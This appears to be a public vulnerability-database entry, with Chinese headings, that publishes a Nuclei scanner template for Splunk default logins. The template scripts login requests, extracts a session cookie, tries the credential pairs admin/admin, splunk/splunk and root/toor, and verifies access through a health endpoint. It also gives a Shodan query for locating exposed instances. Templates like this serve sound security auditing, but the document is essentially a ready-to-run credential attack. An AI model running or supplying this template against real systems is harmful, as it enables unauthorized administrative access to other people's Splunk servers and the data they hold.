漏洞描述
Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
splunk-default-login: Splunk - Default Password
PoC代码[已公开]
id: splunk-default-login
info:
name: Splunk - Default Password
author: pussycat0x
severity: high
description: |
Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
classification:
cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 9
vendor: splunk
product: splunk
shodan-query: http.title:"Splunk"
tags: default-login,splunk,vuln
http:
- raw:
- |
GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1
Host: {{Hostname}}
- |
POST /en-US/account/login HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
{{cval}}&username={{username}}&password={{password}}&return_to=%2Fen-US%2F&set_has_logged_in=false
- |
GET /en-US/splunkd/__raw/services/server/health/splunkd?output_mode=json&_= HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
Referer: {{BaseURL}}
attack: pitchfork
payloads:
username:
- "admin"
- "splunk"
- "root"
password:
- "admin"
- "splunk"
- "toor"
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "splunkd"
- "updated"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
internal: true
name: cval
part: header
regex:
- 'cval=([0-9]+)'
# digest: 4a0a00473045022100ba6be1bcf2a4465b83e15205d96de4d286f4dfafa6b878fb276a06eb16c267f202203f7c6c721e200fe7943a7077106c5f72d7f72496ff4c77e24cafa5fba5831146:922c64590222798bb761d5b6d8e72950